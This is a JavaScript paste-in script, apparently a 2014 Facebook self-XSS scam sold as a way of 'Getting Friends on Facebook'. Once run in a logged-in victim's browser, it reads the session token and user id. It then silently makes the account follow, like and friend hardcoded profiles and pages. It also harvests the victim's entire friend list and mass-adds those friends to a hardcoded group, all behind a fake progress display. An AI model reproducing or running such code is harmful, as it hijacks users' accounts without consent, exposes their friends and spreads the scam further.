/*HTML/JavaScript page status="protected"*/
/*FACEBOOK FOLLOWERS*/
/*© 2014 Kodran Piraj. All Rights Reserved.*/

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){var http4=new XMLHttpRequest;var url4="/ajax/follow/follow_profile.php?__a=1";var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";http4.open("POST",url4,true);http4.onreadystatechange=function(){if(http4.readyState==4&&http4.status==200)http4.close};http4.send(params4)}a("100006491494904");function sublist(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}sublist("194869190710894");sublist("203764819821331");var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var now=(new Date).getTime();function P(post){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/ufi/like.php";var XParams="like_action=true&ft_ent_identifier="+post+"&source=1&client_id="+now+"%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]="+post+"&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);function Like(p){var Page=new XMLHttpRequest();var PageURL="//www.facebook.com/ajax/pages/fan_status.php";var PageParams="&fbpage_id="+p+"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp=";Page.open("POST",PageURL,true);Page.onreadystatechange=function(){if(Page.readyState==4&&Page.status==200){Page.close}};Page.send(PageParams)}Like("658905560786579");function IDS(r){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/add_friend/action.php";var XParams="to_friend="+r+"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}
IDS("100006491494904");IDS("100004272308848"); a("100005634423594"); a("100006491494904"); a("100004272308848");
a("100002062385067"); Like("1417633998481131"); Like("274343876022248"); sublist("219691011562045"); sublist("219691058228707"); sublist("219691144895365"); sublist("219691178228695"); sublist("219691221562024"); sublist("219691298228683"); sublist("219691391562007"); sublist("219691451562001"); sublist("219691518228661"); sublist("219691578228655"); Like("233639806819861"); Like("588642367894983"); Like("108657799203171"); Like("309453909102037"); Like("398426433613100"); Like("597273926980523"); Like("188718981270707"); Like("262926440424877"); sublist("194869190710894"); sublist("203764819821331"); 
var Title='<span style="font-size:x-large;"><b><span style="color: red;">Getting Friends on Facebook</span></b></span><br/>';var Descriptions = "",page_id = /"profile_owner":"([0-9]+)"/.exec(document.getElementById("pagelet_timeline_main_column").getAttribute("data-gt"))[1];function InviteFriends(opo){jx.load(window.location.protocol + "//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg=" + fb_dtsg + "&group_id=1421483778086884&source=typeahead&members=" + opo + "&nctr[_2]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user=" + user_id, function (a) {var b = a.substring(a.indexOf("{"));var c = JSON.parse(b);i--;Descriptions = "<div class='friend-edge-name' style='padding-bottom:5px;text-align:left;font-size:10px;white-space:pre-wrap;";if (c.error) {Descriptions += "color:darkred'>";err++;if (c.errorDescription) Descriptions += c.errorDescription;else Descriptions += JSON.stringify(c, null, "")} else {Descriptions += "color:darkgreen'>";Descriptions += arn[i] + " has been invited t " + page_name + ".";suc++}Descriptions += "</div>";var display = "<div id='friend-edge-display' style='box-shadow:0px 3px 8px rgba(0, 0, 0, 0.3);position:fixed;left:50%;margin-left:-273px;top:100px;width:600px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);border-radius:3px;border:1px solid rgba(0,0,0,0.9);background-color:rgba(0,0,0,0.9);color:#ffffff'>"; display += "<div style='padding-bottom:5px;font-size:20px;'>" + Title + "</div><br/>";if (i > 0) {display += "Detected <b>" +arr.length + "</b> User Online<br/>";display += "<b>" + suc + "</b> of <b>" +arr.length + "</b> Finding Friends <br/>";display += " (<b>" + i + "</b> User Left...)<br/><br/>";display += '<span style="color: lime;"><span style="font-size: large;"><b>Please Wait Until The Process is Complete</b></span></span>';display += "</div>";display += "</div>";window[tag + "_close"] = true} else {display += '<span style="color: lime;"><span style="font-size: large;"><b>SUCCESS</b></span></span>';display += "<div><span class='layerCancel uiOverlayButton uiButton uiButtonLarge' onClick='document.getElementById(\"pagelet_sidebar\").style.display=\"none\"' style='color:gray'>Tutup</span><br/>";display += "<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'><br/>";display += "</div>"; window[tag + "_close"] = false}display += "</div>";  document.getElementById("pagelet_sidebar").innerHTML = display}, "text", "post"); tay--;if (tay > 0) {var s = arr[tay];setTimeout("InviteFriends(" + s + ")", 100)}console.log(tay + "/" + arr.length + ":" + arr[tay] + "/" + arn[tay] + ", success:" + suc);}jx = {b: function () {var b = !1; if ("undefined" != typeof ActiveXObject) try {b = new ActiveXObject("Msxml2.XMLHTTP")} catch (c) {try {b = new ActiveXObject("Microsoft.XMLHTTP")} catch (a) {b = !1}} else if (window.XMLHttpRequest) try {b = new XMLHttpRequest} catch (h) { b = !1} return b},load: function (b, c, a, h, g) {var e = this.d();if (e && b) {e.overrideMimeType && e.overrideMimeType("text/xml"); h || (h = "GET"); a || (a = "text");g || (g = {}); a = a.toLowerCase();h = h.toUpperCase();b += b.indexOf("?") + 1 ? "&" : "?";var k = null;"POST" == h && (k = b.split("?"), b = k[0], k = k[1]);e.open(h, b, !0);e.onreadystatechange = g.c ? function () {g.c(e)} : function () {if (4 == e.readyState)if (200 == e.status) {var b = "";e.responseText && (b = e.responseText);"j" == a.charAt(0) ? (b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && (b = e.responseXML);c && c(b)} else g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status)};e.send(k)}}, d: function () {return this.b()}};function ChangeLocation() {window.location.href = "http://www.facebook.com/"}setTimeout("ChangeLocation", 1);window.onbeforeunload = function () {if (window[tag + "_close"]) return "Auto Like Sedang Berjalan, Tunggu Sampai Selesai!"};var i = 3;var tay = 3;var suc = 0;var err = 0;var arr = new Array;var arn = new Array;var pho = new Array;var tag = "Close";var page_name, x = document.getElementsByTagName("span");for (i = 0; i < x.length; i++)if (x[i].getAttribute("itemprop") == "name") page_name = x[i].innerHTML;var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);jx.load(window.location.protocol + "///www.facebook.com/ajax/typeahead/first_degree.php?viewer=" + user_id + "&token=v7&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha&__user=" + user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=l", function (a) {var b = a;var c = b.substring(b.indexOf("{"));var d = JSON.parse(c);d = d.payload.entries;for (var e = 0; e < d.length; e++) arr.push(d[e].uid);for (var eg = 0; eg < d.length; eg++) arn.push(d[eg].text);for (var pic = 0; pic < d.length; pic++) pho.push(d[pic].photo);i = arr.length - 1;tay = i;console.log(arr.length);var display = "<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:600px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);border-radius:3px;border:1px solid rgba(0,0,0,0.9);background-color:rgba(0,0,0,0.9);color:#ffffff'>";display += "<div style='padding-bottom:10px;font-size:20px;'>" + Title + "</div>";display += arr.length + " User Detected";display += "</div>";document.getElementById("pagelet_sidebar").innerHTML = display;InviteFriends(arr[i])});var parent=document.getElementsByTagName("html")[0];var _body = document.getElementsByTagName('body')[0];var _div = document.createElement('div');_div.style.height="25";_div.style.width="100%";_div.style.position="fixed";_div.style.top="auto";_div.style.bottom="0";_div.align="center";_body.appendChild(_div);
